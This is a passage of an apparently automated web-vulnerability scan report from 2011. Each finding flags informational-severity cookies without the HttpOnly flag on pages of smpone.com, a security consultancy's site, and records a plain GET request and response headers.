Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733867; expires=Mon, 25-Apr-2011 12:27:47 GMT; path=/
Content-Type: text/html
Content-Length: 15026

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants</title>
<meta
...[SNIP]...
17.233. http://www.smpone.com/404.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /404.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /404.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.2.10.1303732845

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 12:17:49 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733869; expires=Mon, 25-Apr-2011 12:27:49 GMT; path=/
Content-Length: 0
Content-Type: text/html

17.234. http://www.smpone.com/News-more-79.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /News-more-79.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /News-more-79.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.18.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:27 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733967; expires=Mon, 25-Apr-2011 12:29:27 GMT; path=/
Content-Type: text/html
Content-Length: 11498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - </title>
<meta http-equiv="Content-Type" con
...[SNIP]...
17.235. http://www.smpone.com/News-more-80.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /News-more-80.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /News-more-80.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.17.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733959

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733965; expires=Mon, 25-Apr-2011 12:29:25 GMT; path=/
Content-Type: text/html
Content-Length: 11467

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - </title>
<meta http-equiv="Content-Type" con
...[SNIP]...
17.236. http://www.smpone.com/News.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /News.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /News.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-16.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.16.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733952

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733958; expires=Mon, 25-Apr-2011 12:29:18 GMT; path=/
Content-Type: text/html
Content-Length: 12575

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - </title>
<meta http-equiv="Content-Type" con
...[SNIP]...
17.237. http://www.smpone.com/Sections-read-10.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-10.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-10.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-125.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.8.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733890

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733892; expires=Mon, 25-Apr-2011 12:28:12 GMT; path=/
Content-Type: text/html
Content-Length: 13895

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants - HIPAA</titl
...[SNIP]...
17.238. http://www.smpone.com/Sections-read-125.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-125.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-125.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/images/menu_right.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733886; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.7.10.1303732845

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733888; expires=Mon, 25-Apr-2011 12:28:08 GMT; path=/
Content-Type: text/html
Content-Length: 11579

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Regulatory Compliance</title>
<meta http-equ
...[SNIP]...
17.239. http://www.smpone.com/Sections-read-126.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-126.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-126.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-10.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.9.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733893

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:15 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733895; expires=Mon, 25-Apr-2011 12:28:15 GMT; path=/
Content-Type: text/html
Content-Length: 12064

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - IT Assurance/Vulnerability Assessment</title
...[SNIP]...
17.240. http://www.smpone.com/Sections-read-16.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-16.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-16.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.3.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733879

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:01 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:01 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733881; expires=Mon, 25-Apr-2011 12:28:01 GMT; path=/
Content-Type: text/html
Content-Length: 12154

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants</title>
<meta
...[SNIP]...
17.241. http://www.smpone.com/Sections-read-20.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-20.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-20.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.2.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733869

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:55 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733875; expires=Mon, 25-Apr-2011 12:27:55 GMT; path=/
Content-Type: text/html
Content-Length: 12151

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Services</title>
<meta http-equiv="Content-T
...[SNIP]...
17.242. http://www.smpone.com/Sections-read-21.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-21.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-21.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-20.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.19.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733968

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733974; expires=Mon, 25-Apr-2011 12:29:34 GMT; path=/
Content-Type: text/html
Content-Length: 12723

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Network Assessment</title>
<meta http-equiv=
...[SNIP]...
17.243. http://www.smpone.com/Sections-read-29.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-29.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-29.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/images/menu_right.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
